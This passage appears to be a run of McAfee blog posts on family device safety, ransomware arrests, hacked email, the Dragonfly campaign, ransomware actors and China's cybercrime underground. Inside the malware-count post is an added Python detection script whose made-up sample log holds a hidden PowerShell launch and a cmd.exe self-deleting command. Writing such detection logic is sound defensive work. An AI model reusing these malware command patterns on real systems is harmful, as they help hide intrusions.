    Products to put on your list: Smart TVs, digital assistants such as Alexa and Echo, drones, laptops, tablets, personal computers, home automation systems such as The Nest, home security systems, your home network, smartphones, Bluetooth car kits, digital toys, game systems, electronic keypads on doors and garages, digital cameras, baby monitors, and any digital appliance. Even cars can be targets for hackers as seen in the Jeep hack of 2015, in which hackers used a laptop to disable a car’s engine on the freeway and forced Fiat Chrysler to recall hundreds of thousands of vehicles.

    With more homes becoming fully connected, experts agree it’s going to become harder to secure your privacy not only from hackers but marketers spying on users for profit. Do your homework on a product’s security standards before you purchase items and know what security gaps are currently in your home. Tip: Companies know that customers rarely read privacy agreements. Weak agreements tempt corporations to frequently change the privacy agreement after the devices and services are deployed to capture more customer information and revenue.

    Talk More About the Big 3

    Talking to your kids about digital safety is your most valuable defense against family security mishaps. Remind your kids of the Top Three Rules of Digital Responsibility: 1) Don’t interact with strangers online 2) Don’t share personal information such as home address, email, birthdate or personal activities and plans and 3) Don’t upload or download inappropriate content or photos. The Internet never forgets, and the damage done can be devastating.

    Pay Attention to App Privacy

    As identified in our threat predictions report, more and more kids are downloading apps with loose guidelines on how companies can use user-generated content. Educate your child about why this poses a danger and how daily interactions with these fun, social apps can affect their reputations in the future.

    Slow Down, Click with Care

    Living in a streaming, posting, click-here-now world has forced us to read and respond quickly. In doing so, we miss vital details, get in digital misunderstandings, and risk our privacy by clicking suspicious links. In 2018, take back your digital control by merely slowing down. Be it email, texts, social media posts — stop and think before you post, respond, or click links. Cybercrooks understand our habits and are always looking to exploit our weak points.

    Make More Meaningful Connections

    The ability to connect with others 24/7 can be both empowering and debilitating. We know in our knower when we are spending too much time glued to our smartphone and when our kids are also. Online connections will never compare to the rich relationships we can experience offline. This year, resolve to help your kids maintain a healthy perspective on digital versus face-to-face interactions. A healthy digital balance is especially crucial during tween and teen years since studies show that the more time kids spend online, the more isolation and depression can set in. Resolve to curb screen time by modeling balance, planning physical activity and phone-free outings, and establishing phone free zones in the home.

    Remember, in making changes in this new year resolve not to look back. Embrace 2018 for all it is: A clean slate primed and ready for your family to establish and set new habits in motion. You’ve got this!


    Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures).


    The post 2018 Resolution: Lose the Weight of Tech Safety Guilt Once and for All appeared first on McAfee Blogs.

    Be Unhackable: Here’s Your Post-Holiday Gift Safety Checklist

    ‘Twas the night after Christmas, when all through the house
    All the smart toys were buzzing and beeping about,
    The chargers were plugged near the chimney with care,
    Without a clue that the hackers soon would be there.

    With the height of the season now behind us, you may be experiencing a bit of a holiday hangover. But as you wade through the holiday fallout of wrapping paper, instruction manuals, batteries packs, and downloads, don’t forget that the most important step to your family enjoying its cache of digital gifts is protecting them.

    McAfee’s Most Hackable Toys 2017 survey revealed our shared habits of connectivity minus solid safeguards. What we know: while most of us realize the importance of protecting our internet-connected devices, we aren’t too concerned with making device security a priority.

    So, now that you’ve purchased that new smartphone, drone, smart toy, or appliance, take that next simple step to secure your expanding digital home. Here’s a short, post-holiday checklist to help get you started.

    Smart Gift Checklist

    Settings, passwords, software. Once you’ve powered up your new device: 1) Make sure it’s password protected with two-step authentication. 2) Set a PIN or passcode to lock your device. 3) Install the latest software versions as soon as possible and update them regularly. 4) Protect your new devices with additional security software if possible. 5) Avoid downloading suspicious apps and never click on strange links that arrive via email, messenger, or text. 6) And here’s a biggie: if you are selling, donating, or recycling your old devices, make sure you wipe them clean.

    Research the risks. According to the same McAfee study, some of the most popular digital gifts of 2017 include tablets, smartphones, drones, digital assistants, and connected toys and appliances — all of which come with inherent security risks. With the growing list of smart devices, hackers have a million new entryways into our homes. Google the name and model of your new gift and read about possible security holes. Another valuable resource is online reviews posted by people who have encountered security issues.

    ‘Take Five’ before having fun. Securing a new gift often takes five minutes, but it’s a must in today’s wired world. Go into your new product’s privacy settings and change manufacturer settings and set a new password. Keep the process simple and allow your kids to do it alongside you so that device security is more likely to become a habit.

    Don’t be duped by cute. From fuzzy talking puppies to adorable dolls, toys can also carry massive security risks. It’s important to research if there have been any reported security vulnerabilities with toys you’ve purchased or have been gifted, so you know how to secure them. Don’t let a toy’s appearance lull you into a false sense of security. Remember: It may look like a kitty cat, but if it connects to the world wide web, then it’s a computer that could be transmitting data to a remote server. When using connected toys: 1) Use toys in places with trusted and secured wi-fi. 2) Monitor your child’s activity with the toys (such as conversations and voice recordings) through the toy’s partner parent application, if available. 3) Take time to read the toy’s disclosures and privacy policies.

    Refresh passwords on your home network. Secure all of your connected devices and your home internet at its source — the network. Avoid routers that come with your ISP (Internet Service Provider) since they are often less secure. And, make it a point to change your passwords regularly.

    It’s impossible to protect against all risks, but you can frustrate a hacker’s plans by putting up some security obstacles. Even though security and privacy risks come with our new gifts, it’s clear that the demand for faster, better, more impressive digital products is here to stay. Taking the time to boost your family’s security will help make sure this holiday remains a happy one into the New Year and beyond.

    The post Be Unhackable: Here’s Your Post-Holiday Gift Safety Checklist appeared first on McAfee Blogs.

    McAfee Labs Advanced Threat Research Aids Arrest of Suspected Cybercrime Gang Linked to Top Malware CTB Locker

    In our recent research, we interviewed the actors behind ransomware campaigns. One of the interesting findings was that cybercriminals seemed to have a sense of absolute safety when conducting criminal operations. Cybercrime is an area of crime like no other, perceived as low-risk with high returns, which contributes greatly to its rapid growth.

    Today, with the arrest of individuals suspected of infecting computer systems by spreading the CTB Locker malware, a clear message has been sent—involvement in cybercrime is not zero-risk.

    CTB Locker

    CTB Locker, also known as Critroni, is known as one of the largest ransomware families—helping to drive a new ransomware surge of 165 percent in 2015 as one of the top three ransomware families, and earning a spot as No. 1 just a year later. Operation Tovar, in which law enforcement agencies took down the infrastructure responsible for spreading CryptoLocker, created a need for more malware—CTB Locker and CryptoWall malware families helped to fill the gap.

    In June 2014, the CTB Locker authors began to advertise the malware family on the underground scene at a cost of $3,000USD, where people could buy the first versions for $1,500USD. The authors also offered an affiliate program, which made CTB Locker infamous. By sharing a percentage of the received ransoms, the affiliates ran the greater risk—because they had to spread the ransomware—but they also enjoyed the higher profits. By using exploit kits and spam campaigns, the malware was distributed all over the world, mostly targeting “Tier 1” countries, those in which the victims could afford to pay and most likely would pay the ransom. Midway through 2015, we gained unique information from an affiliate server that helped us tremendously in the subsequent investigations.

    A CTB Locker affiliate server.
    An example of CTB Locker source code.

    Besides the use of an affiliate server in CTB Locker’s infrastructure, two other components complete the setup: a gateway server and a payment server.

    Attacks Begin to Grow

    During 2016, a massive spam campaign struck the Netherlands. Emails in Dutch seemed to originate from one of the largest telco providers. The emails claimed to have the latest bill attached. There was no bill, of course, rather CTB Locker asking for around $400USD of ransom to return files. The grammar and word usage were near perfect—not what we commonly observe—and the names in the email were proof of a well-prepared campaign. More than 200 cases in the Netherlands alone were filed regarding these infections.

    With attacks growing in number, the Dutch High Tech Crime Unit began an investigation. The unit approached McAfee’s Advanced Threat Research team to assist in identifying samples and answering questions.

    Following our research, we were kept updated and were informed that in the early morning of December 14 operation “Bakovia” started. The initial research was on the CTB Locker ransomware but based on information from the U.S. Secret Service, it was determined that the same suspected gang was also linked to distribution of Cerber ransomware—another major family.

    The Arrests

    During the operation in East Romania, six houses were searched, whereby the investigators seized a significant number of hard drives, laptops, external storage devices, cryptocurrency mining rigs, and hundreds of SIM cards. Suspects were arrested for allegedly spreading CTB Locker ransomware, and other suspects allegedly responsible for spreading Cerber were arrested at the airport in Bucharest.


    The law enforcement action emphasizes the value of public-private partnerships and underscores the determination behind the McAfee mantra “Together is power.”

    The post McAfee Labs Advanced Threat Research Aids Arrest of Suspected Cybercrime Gang Linked to Top Malware CTB Locker appeared first on McAfee Blogs.

    What To Do If Your Email Is Hacked

    I think I could count on my hand the people I know who have NOT had their email hacked. Maybe they found a four-leaf clover when they were kids!

    Email hacking is one of the very unfortunate downsides to living in our connected, digital world. And it’s often a situation that even the savviest tech experts find themselves in. In August this year, over 700 million email addresses (and a large number of passwords) were leaked publicly courtesy of a misconfigured spambot (a program designed to collect email addresses). Many savvy tech types were caught up in the hack, including Troy Hunt, a leading Australian computer security expert and creator of Have I Been Pwned?.

    Just this month it was confirmed that every single Yahoo email account was compromised in the 2013 data breach. That is a whopping 3 billion accounts, with stolen data including names, email addresses, phone numbers and birth dates. And recent reports have confirmed that thousands of Australian Government Officials, including high-profile politicians, Defence Officials, judges and members of the Australian Federal Police, were among the victims.

    So, in short – it can happen to anyone…

    But Why Should I Worry? I Have Nothing Valuable in My Email

    If you have an identity and email address you are very valuable to a hacker – no exceptions! Even if you don’t consider yourself to have Kim Kardashian’s celebrity status or the CEO power of James Packer, a hacker is still very keen to collect every piece of information they can about you.

    Remember, hackers want to get their hands on your data. Why – I hear you ask? So they can cash in! Some will keep the juicy stuff for themselves – passwords or logins to government departments or large companies they may want to ‘target’. But the more sophisticated ones will sell your details, including name, telephone, email address and credit card details, and cash in on the Dark Web. They often do this in batches. Some experts believe they can get as much as AU$140 for a full set of details including credit cards.

    So, you can see why they’d be interested in you!

    How Big Is the Problem?

    There is a plethora of statistics on just how big this issue is – all of them concerning!

    According to IDCARE – a support service for Australian and New Zealand victims of identity fraud – about 1 million Australians have their identity stolen each year at a cost of about $1 billion.

    The Australian Competition and Consumer Commission (ACCC) recently revealed that hacking scams cost Australian businesses close to $3 million during 2016, with the number of people reporting scam activity at record levels.

    The Australian Cyber Security Centre nominates $20 million as the fallout from ‘phony emails’ aka phishing in 2016/7.

    Regardless of which statistic you choose to focus on, we have a big issue on our hands!

    So, What Do I Do If My Email Is Hacked?

    If you find yourself a victim of email hacking there are a few very important steps you need to take. But the key here is to act FAST!!

    1. Change Your Password

    This is the very first thing you must do to ensure the hacker can’t get back into your account. It is essential that your new password is complex and totally unrelated to previous passwords. Always use at least 8-10 characters with a variety of upper and lower case and throw in some symbols and numbers. I really like the idea of a crazy, nonsensical sentence – easier to remember and harder to crack!

    If you find the hacker has locked you out of your account by changing your password, you will need to reset the password by clicking on the Forgot My Password link.

    2. Let Your Email Contacts Know

    A big part of the hacker’s strategy is to ‘get their claws’ into your address book with the aim of hooking others as well. Send a message to all your email contacts as soon as possible so they know to avoid opening any emails (most likely loaded with malware) that have come from you.

    3. Change Your Security Question

    If you have a security question associated with your email account, please change this too. And please make it unpredictable and niche! It is possible that this was how the hackers broke into your account in the first place. When Yahoo had 500 million accounts hacked in 2014, not only were the passwords stolen but the security questions too. If you have a security question associated with your account, make up a response that makes no sense. This is the perfect opportunity to tell a lie!

    4. Commit to Multi Factor Authentication

    Yes, multi-factor authentication adds another step to your login but it also adds another layer of protection. Enabling this will mean that in addition to your password, you will need a special one-time use code to login. This is usually sent to your mobile phone. So worthwhile!

    5. Check Your Email Settings

    It is not uncommon for hackers to modify your email settings so that a copy of every email you receive is automatically forwarded to them. Not only can they monitor your logins for other sites but they’ll keep a watchful eye over any particularly juicy personal information! So, check your mail forwarding settings to ensure no unexpected email addresses have been added.

    Don’t forget to check your email signature to ensure nothing spammy has been added. And also ensure your ‘reply to’ email address is actually yours! Hackers have been known to create an email address here that looks similar to yours – when someone replies, it goes straight to their account, not yours!

    6. Scan Your Computer for Malware and Viruses

    This is essential also. If you find anything, please ensure it is addressed and then change your email password again. And if you don’t have it – please invest. Comprehensive security software will provide you with a digital shield for your online life. McAfee Total Protection lets you protect all your devices – including your smartphone – from viruses and malware. It also contains a password manager to help you remember and generate unique passwords for all your accounts.

    7. Change Any Other Accounts with the Same Password

    Time consuming but very worthwhile! Ensure you change any other accounts that use the same username and password as your compromised email. Hackers love the fact that many of us use the same logins for multiple accounts, so it is guaranteed they will try your info in other email applications and sites such as PayPal, Amazon, Netflix – you name it!

    8. Consider Creating a New Email Address

    If you have been hacked several times and your email provider isn’t mitigating the amount of spam you are receiving, then consider starting afresh, but don’t delete your email address! Many experts do warn against deleting email accounts, as most email providers will recycle your old email address. This could mean a hacker could spam every site they can find with ‘forgot my password’ requests and try to impersonate you – identity theft!

    Your email is an important part of your online identity, so being vigilant and addressing any fallout from hacking is essential for your digital reputation. And even though it may feel that ‘getting hacked’ is inevitable, you can definitely reduce your risk by installing some good quality security software on all your devices. Comprehensive security software such as McAfee Total Protection will alert you when visiting risky websites, warn you when a download looks ‘dodgy’ and will block annoying and dangerous emails with anti-spam technology.

    It makes sense really – if you don’t receive the ‘dodgy’ phishing email – you can’t click on it! Smart!

    And finally, don’t forget that hackers love social media – particularly those of us who overshare on it. So, before you post details of your adorable new kitten, remember it may just provide the perfect clue for a hacker trying to guess your email password!


    Alex x

    The post What To Do If Your Email Is Hacked appeared first on McAfee Blogs.

    Operation Dragonfly Analysis Suggests Links to Earlier Attacks

    On September 6, Symantec published details of the Dragonfly campaign, which targeted dozens of energy companies throughout 2017. This attack was effectively Dragonfly 2.0, an update to a campaign that began in 2014.

    Moving beyond our 2014 analysis of Dragonfly, our current focus looks at the attack’s indicators to determine whether we can glean any further information regarding the source and possible motivations of those behind the campaign. The campaign targets energy companies around the world by leveraging spear-phishing emails that, once successful, allow the attackers to download Trojan software. The Trojans provide access to the victims’ systems and networks.

    Going Beyond Energy

    Although initial reports showed Dragonfly attacks targeting the energy sector, investigations by McAfee Labs and the Advanced Threat Research team uncovered related attacks targeting the pharmaceutical, financial, and accounting industries. Everything about this campaign points to a well-prepared assault that carefully considers each target, and conducts reconnaissance before taking any measures to exploit compromised targets.

    We saw the group use several techniques to get a foothold in victims’ networks, including spear phishing, watering holes, and exploits of supply-chain technologies via previous campaigns. By compromising well-established software vulnerabilities and embedding within them “backdoor” malware, the victims think they are installing software from a trusted vendor, while unaware of the supply-side compromise.

    Once the attackers have a foothold, they create or gain user accounts to operate stealthily. Using the remote-desktop protocol to hop among internal or external systems, they connect either to a control server if the risk is minimal or use an internal compromised server to conduct operations.

    The last wave of attacks used several backdoors and utilities. In analyzing the samples, we compared these with McAfee’s threat intelligence knowledge base of attack artifacts.

    One of the starting points was a Trojan in the 2017 campaign with the following hashes:

    • MD5: da9d8c78efe0c6c8be70e6b857400fb1
    • SHA-256: fc54d8afd2ce5cb6cc53c46783bf91d0dd19de604308d536827320826bc36ed9

    Comparing this code, we discovered another sample from the group that was used in a July 2013 attack:

    • MD5: 4bfdda1a5f21d56afdc2060b9ce5a170
    • SHA-256: 07bd08b07de611b2940e886f453872aa8d9b01f9d3c61d872d6cfe8cde3b50d4
    • Filename: fl.exe

    The file was downloaded after a Java exploit executed on the victim’s machine, according to the 2013 attack report. After analyzing the 2013 sample, we noticed that some of the executable’s resources were in Russian.

    Comparing the code, we find the 2017 sample has a large percentage of the same code as the backdoor used in the 2013 attacks. Further, some code in the 2017 backdoor is identical to code in the application TeamViewer, a legitimate remote administration tool used by many around the world. By incorporating the code and in-memory execution, the attackers avoid detection and leave no trace on disk.

    The correlating hash we discovered that contained the same TeamViewer code was reported by Crysys, a Hungarian security company. In their report on “TeamSpy,” they mentioned the hash we correlated as well: 708ceccae2c27e32637fd29451aef4a5. This particular sample had the following compile date details: 2011:09:07 – 09:27:58+01:00

    The TeamSpy attacks were originally aimed at political and human rights activists living in the Commonwealth of Independent States (the former Soviet Union) and eastern European countries. Although the report attributes the attacks to a threat actor or actors on the basis of shared tactics and procedures, the motivations behind TeamSpy appear similar to those of the Dragonfly group. With identical code reuse, could the TeamSpy campaign be the work of Dragonfly?

    But that’s not all of interest. We also discovered that the 2017 sample contained code blocks associated with another interesting malware family: BlackEnergy. Let’s look at an example of the code similarities we discovered:

    A BlackEnergy sample from 2016 (at left) alongside a Dragonfly sample from 2017.

    Self-deleting code is very common in malware, but it is usually implemented by creating a batch file and executing the batch instead of directly calling the delete command, as we see in the preceding examples.

    The BlackEnergy sample used in our comparison was captured in Ukraine on October 31, 2015, and was mentioned in our post on the evolution of the BlackEnergy Trojan. It is remarkable that this piece of code is almost identical in both samples, and suggests a correlation between the BlackEnergy and Dragonfly campaigns.

    Actor Sophistication

    Our analysis of this attack tells a story about the actors’ capability and skills. Their attack precision is very good; they know whom and what to attack, using a variety of efforts. Their focus is on Windows systems and they use well-known practices to gather information and credentials. From our research, we have seen the evolution of the code in their backdoors and the reuse of code in their campaigns.

    How well do the actors cover their tracks? We conclude they are fairly sophisticated in hiding details of their attacks, and in some cases in leaving details behind to either mislead or make a statement. We rate threat actors by scoring them in different categories; we have mentioned a few. The Dragonfly group is in the top echelon of targeting attackers; it is critical that those in the targeted sectors be aware of them.

    The Dragonfly group is most likely after intellectual property or insights into the sector they target, with the ability to take offensive disruptive and destructive action, as was reported in the 2015 attack on the Ukrainian power grid by a BlackEnergy malware family.


    We would like to thank the team at Intezer for their assistance and support during our research.

    The post Operation Dragonfly Analysis Suggests Links to Earlier Attacks appeared first on McAfee Blogs.

    Looking Into the World of Ransomware Actors Reveals Some Surprises

    During the preparations for our keynotes at McAfee’s recent MPOWER conference, we brainstormed a few topics we wanted to share with the audience. Ransomware was definitely on our agenda, but so much has already been said and written on the subject. What could we add that would be interesting?

    We hit on the angle: to dive into this shady world and learn about the people behind these campaigns. There are several ways to approach this. We could go into forums and look for the individuals who discuss these campaigns or offer ransomware for sale. But that would be very time consuming and the chance of finding the right individuals would be small. There is a better way.

    In most samples of ransomware, once the malware executes and files are encrypted, the “ransom note” appears. Either a background drop or a text file contains the details. During 2017 we saw many of these notes contain an email address for questions or for payment details and releasing files.


    We looked at three months of unique ransomware samples and extracted either the images or the notes that contained the contact addresses. As new ransomware families popped up in our tracker, we verified them and added the addresses—because these fresh attacks made it likely the authors would interact with us.

    But how could we convince the actors to answer our questions? We took the role of students working on a master’s thesis and asked the actors if they would be willing to answer a few questions. For a couple of weeks we lived the role of students, eating lots of pizza, drinking sodas, and so on. (You have to live the role, right?)

    We sent our emails and queried the actors who responded. One of our first observations was that of all the emails we retrieved, about 30 percent were either fake or nonexistent. So in these cases when files were encrypted and the victim decided to pay, using email to send evidence of payment was useless. The money was gone (as well as the files).

    During the first week of our research we received answers back from some of the actors, but most were not willing to cooperate. That’s no surprise: They were cautious about revealing their identity.

    During the second week, we had better luck and started to chat with a few. That number grew, and after a few weeks we had a great collection of conversations with the actors.

    “Fast, easy, and safe”

    When we asked why they started a career in ransomware, most answered with variations on “enough money” and “fast, easy, and safe,” especially when using anonymous email services and cryptocurrency for payments.

    Homemade vs. Off the Shelf

    Most of the actors we spoke with wrote their own ransomware. They had looked at the published source code but were clever enough to come up with their own variants that contained new techniques or different approaches to keep detections low. The longer they stayed out of sight of endpoint security solutions, the longer was their opportunity to make money.

    Spending Their Ill-Gotten Gains

    They spend the revenue they gained from their campaigns in various ways: travel, cars. One had many affiliates working for him, so he was soon going to buy a house. One of the most surprising answers was that one turned to ransomware to “pay off his debts.”

    Willing to Negotiate

    Although they often have the image of being ruthless, almost all of them claimed a willingness to negotiate the ransom price in case victims could not afford to pay the demanded amount.

    Tracking the Authors

    One of the actors was so enthusiastic he wanted to sell us ransomware code so we could pay off our college debts. Based on his answers and sharing of information, we noticed that he was not a very experienced actor and he gave clues on his whereabouts. In one of the conversations, he shared some examples, but the data was not scrubbed. By correlating the data he provided with other information, such as email time zones and mistakes in his English, we traced him to Dakar, Senegal. He not only sends ransomware but also sells botnets and other fraud-related services.

    We found the research eye opening. Now we just need a few weeks in the gym to work off all the sodas and pizzas.

    For those suffering from a ransomware attack, you have three options. The first two are bad: lose your files, or pay the ransom and hope (with no guarantee) for a key to unlock your files. The best option is to start with a visit to to see if a decryption tool is available.

    Meanwhile, remember the standard advice on reducing your risk of picking up ransomware: Keep your OS, security, and application software up to date; exercise a healthy dose of skepticism even when you see messages that appear to come from legitimate sources; and do not click on links or open files from unknown names or organizations.


    Learn more about the threat statistics we gathered in Q3, including ransomware in the McAfee Labs Threats Report, December 2017 and follow the team on Twitter at @McAfee_Labs.

    The post Looking Into the World of Ransomware Actors Reveals Some Surprises appeared first on McAfee Blogs.

    McAfee Labs Reports All-Time Highs for Malware in Latest Count

    In the third quarter of 2017, McAfee Labs reports all-time highs of new and total malware. What is causing the increasing numbers of malware that are submitted to us at an average rate of four new malware samples per second?

    One major trend that continues in Q3 is the abuse of Microsoft Office–related exploits and the use of malicious code in macros that activates PowerShell to execute them, so-called fileless attacks.

    In March, an exploit was released that took advantage of CVE-2017-0199, a vulnerability in how Microsoft Office and WordPad handle specially crafted files that could result in remote code execution. During Q3, we saw an increase in the number of crafted files that were submitted. We also noticed that many releases take advantage of a toolkit on GitHub that makes it quite easy to create a “backdoor” attack:

    Another major event in Q3 was a massive spam campaign to distribute a new version of the infamous Locky ransomware “Lukitus.” Within 24 hours, more than 23 million emails were sent. Shortly after the first arrived, security company Comodo Labs discovered another campaign related to this attack that sent more than 62,000 spam emails distributing the ransomware.

    With banking Trojans, we observed the greatest activity from the Trickbot Trojan. We saw several variations in which the actors added new features to their code, for example, cryptocurrency stealing, embedding the EternalBlue exploit, and employing different ways of delivering the malware, which primarily targets the financial sector.

    Another banking Trojan family that appeared often during the quarter was Emotet. In several spamming campaigns users were asked to download a Microsoft Word document from several locations. From our analysis of the attached document, we found the payload was hidden in the macros that used PowerShell to install the Trojan.
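    As an added example (not McAfee’s code and not taken from any of the samples discussed), the following Python detection logic covers the two process behaviours described on this page: an Office application spawning PowerShell from a macro, as in the Emotet and CVE-2017-0199 campaigns above, and the direct or batch-file self-delete noted in the Dragonfly post. The log line format, file paths and names are all constructed for this example; real telemetry such as Sysmon process-creation events carries the same three fields.

```python
"""Two defender-side detections over Windows process-creation events.

  1. office_to_script_host: an Office application spawning PowerShell or another
     script host (the macro-driven, "fileless" delivery described on this page).
  2. self_delete: cmd.exe launched to delete the parent's own executable, either
     directly or via a dropped batch file (the BlackEnergy/Dragonfly trait).

The 'parent=...|image=...|cmd=...' line format is constructed for this example.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "wordpad.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Directories where dropped helper batch files typically land (a weaker signal on its own).
TEMP_DIRS = ("\\temp\\", "\\tmp\\")


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rstrip("\\").rsplit("\\", 1)[-1].lower()


def parse_event(line: str) -> ProcEvent:
    """Parse one constructed 'parent=<path>|image=<path>|cmd=<command line>' line.
    maxsplit=2 keeps any '|' inside the command line intact."""
    fields = dict(part.split("=", 1) for part in line.strip().split("|", 2))
    return ProcEvent(fields["parent"], fields["image"], fields["cmd"])


def office_to_script_host(ev: ProcEvent) -> bool:
    """Office parent -> script-host child: the macro-to-PowerShell chain."""
    return basename(ev.parent_image) in OFFICE_APPS and basename(ev.image) in SCRIPT_HOSTS


def self_delete(ev: ProcEvent) -> Optional[str]:
    """Return 'direct' or 'batch' when cmd.exe looks like a self-delete helper, else None.

    direct: the command line deletes the parent's own image name (cmd /c ... del <parent>).
    batch : the command line only runs a .bat/.cmd from a temp directory; the delete
            would live inside that file, so treat this as lower confidence.
    Limitation: a parent referenced by a different path form (e.g. 8.3 short name)
    will not match the direct rule.
    """
    if basename(ev.image) != "cmd.exe":
        return None
    cmd = ev.command_line.lower()
    parent_name = basename(ev.parent_image)
    if re.search(r"\b(del|erase)\b", cmd) and parent_name in cmd:
        return "direct"
    batch = re.search(r'"?([^"\s]+\.(?:bat|cmd))"?', cmd)
    if batch and any(d in batch.group(1) for d in TEMP_DIRS):
        return "batch"
    return None


def triage(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Run both detections over raw lines; return (rule, parent name, child name) hits."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        parent, child = basename(ev.parent_image), basename(ev.image)
        if office_to_script_host(ev):
            hits.append(("office_to_script_host", parent, child))
        kind = self_delete(ev)
        if kind:
            hits.append((f"self_delete_{kind}", parent, child))
    return hits


# Constructed sample events: every path, file name and user name here is made up.
SAMPLE_LOG = [
    r"parent=C:\Program Files\Microsoft Office\WINWORD.EXE|image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|cmd=powershell.exe -NoP -W Hidden -File C:\Users\alice\AppData\Local\Temp\inst.ps1",
    r'parent=C:\Users\alice\AppData\Local\Temp\fl.exe|image=C:\Windows\System32\cmd.exe|cmd=cmd.exe /c ping 127.0.0.1 -n 3 & del "C:\Users\alice\AppData\Local\Temp\fl.exe"',
    r'parent=C:\Users\alice\Downloads\update.exe|image=C:\Windows\System32\cmd.exe|cmd=cmd.exe /c "C:\Users\alice\AppData\Local\Temp\cleanup.bat"',
    r"parent=C:\Windows\explorer.exe|image=C:\Program Files\Microsoft Office\WINWORD.EXE|cmd=WINWORD.EXE /n report.docx",
    r"parent=C:\Windows\explorer.exe|image=C:\Windows\System32\cmd.exe|cmd=cmd.exe /c dir C:\Users\alice",
]

if __name__ == "__main__":
    for rule, parent, child in triage(SAMPLE_LOG):
        print(f"{rule:24} parent={parent:12} child={child}")
```

Only the first three constructed events fire; the benign Word launch and the plain `dir` command produce no hit, which is the false-positive check to keep when tuning the batch rule against real telemetry.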

    These major campaigns and others caused a tsunami of spam email, distributing a tremendous number of samples that increased the malware storage demands of all of us in the security industry.

    For more details and our usual statistics on malware, breach incidents, and web and network threats, read the McAfee Labs Threats Report, December 2017.

    The post McAfee Labs Reports All-Time Highs for Malware in Latest Count appeared first on McAfee Blogs.

    Chinese Cybercriminals Develop Lucrative Hacking Services

    Underground cybercrime profits in China have likely already exceeded US$15.1 billion (100 billion Chinese yuan); caused more than $13.8 billion (91.5 billion yuan) worth of damage relating to data loss, identity theft, and fraud; and will grow at an even faster pace as underground hackers expand international business operations to increasingly target foreign businesses, according to one report. Advanced hacking tools such as botnet, control server infrastructure, remote access tools, malware creation and obfuscation services, source-code writing services, and targeted exploitation toolkits are available on underground markets.

    Other popular malicious tools and hacking services—such as spam and flooding services, denial-of-service or distributed denial-of-service attack scripts, compromised routers, and hijacked accounts—are also available in China on the black market. Criminal groups are well-organized and establish discreet buying and selling processes for malware and hacking services through QQ networks. (Tencent QQ is one of China’s most popular online communication and Internet service portals. It had more than 870 million active monthly users as of 2016. QQ users can communicate with each other or publish comments through QQ forums, shared space, QQ groups, and private chatrooms.)

    Criminal groups also establish master-apprentice relationships to recruit and train new members to expand their criminal enterprise operations. All of these trends cost businesses in China and around the world tens of billions of dollars, as hacking tools sold online can be used to steal intellectual property or create social engineering attacks.

    Operating Structure

    The Chinese cybercriminal underground market has become more sophisticated and service-oriented as China’s economy becomes more digital. Cybercriminal groups are well-structured with a clear division of work. Contrary to their American and Russian counterparts, Chinese cybercriminals do not rely on the Deep Web. McAfee research indicates that there has been an increasing number of organized crime groups that take advantage of burgeoning QQ networks. These organized crime groups typically possess clear mechanisms for their cybercrime operations. Malware developers usually profit by creating and selling their products online; they do not get involved in underground criminal operations. Their code often includes “backdoors” that offer them continued access to their software.

    QQ hacking group masters (qunzhu, 群主), also known as prawns (daxia, 大虾) or car masters (chezu, 车主) by those in Chinese cybercriminal underground networks, are the masterminds of cybercrime gangs. QQ hacking group masters purchase or acquire access to malware programs from a malware writer or wholesaler. As shown in the following graph, QQ hacking group masters recruit members or followers, who are commonly known as apprentices, and instruct apprentices on hacking techniques such as setting up malicious websites to steal personally identifiable information or bank accounts. In most cases, QQ hacking group masters collect “training fees” from the apprentices they recruit. The apprentices later become professional hackers working for their masters. Apprentices are also required to participate in multiple criminal “missions” before they complete the training programs. These hacker groups are usually private: The group masters can accept or deny membership requests on QQ networks.


    Master-Apprentice Mechanism

    Black-hat training is growing in popularity on the black market due to high profit margins in the hacking business. Some hacker groups use these training programs to recruit new members. Once they complete the training, selected members will be offered an opportunity as apprentices or “hackers in training,” who later become full-time hackers responsible for operations such as targeted attacks, website hacking, and database exfiltration. (See the preceding graph.) The apprentices gain further experience by taking part in cybercrime schemes, including stealing bank account passwords, credit card information, private photos, personal videos, and virtual currency such as Q coins. The following screenshot is an example of black-hat hacker training materials offered by an underground hacker.

    Training program offered by an underground hacker.


    The Chinese cybercriminal underground business has become more structured, institutional, and accessible in recent years. A great number of QQ hacking groups offer hacking services. Just as in the real world, cybercriminals and hackers take online orders. Prospective customers can fill out their service requests—including types of attacks, targeted IP addresses, tools to be deployed—and process the payments online. For example, some QQ groups provide website takedown services, which can cost up to tens of thousands of yuan, depending on the difficulty of the tasks and the security level of a targeted system. There are also QQ groups that hire black-hat hackers to conduct attacks against commercial and government targets for profit. The following list shows many of the top activities:

    • DDoS services
    • Black-hat training
    • Malware sales
    • Advanced persistent attack services
    • Exploit toolkits sales
    • Source-code writing services
    • Website hacking services
    • Spam and flooding services
    • Traffic sales
    • Phishing website sales
    • Database hacking services

    Buying Hacking Services and Malware

    Some hacking groups provide 24/7 technical support and customer service for customers who do not have a technical background. A hacking demonstration is also available upon request. Prices are negotiable in some cases. After agreeing on the price, the hacker-for-hire sends an email confirmation with detailed payment information. Prospective clients can transfer payments online through Taobao or Alipay.  However, prospective customers are usually required to submit an upfront deposit, which can be as much as 50% of the agreed price. Once the service is complete, the hacker-for-hire will request payment on the remaining balance.

    Steps in the hacking service transaction process:

    • Negotiating price
    • Making a deposit
    • Demonstration (if requested)
    • Beginning the hacking services
    • Paying the balance

    Buyers must submit full payment for software purchases such as malware, attack tools, and exploit toolkits.

    Steps in the malware purchase transaction process:

    • Negotiating price
    • Paying in full for malware
    • Receiving product or exploit kit


    The Chinese cybercriminal underground mostly targets Chinese citizens and businesses. However, a growing number of criminal groups offer hacking services that target foreign websites or businesses. These underground criminal groups are stealthy and have gradually grown in sophistication through an institutionalized chain of command and by establishing master-and-apprentice relationships to expand their business operations. They offer a variety of malicious tools and hacking services through QQ networks and have established successful surreptitious transaction processes.


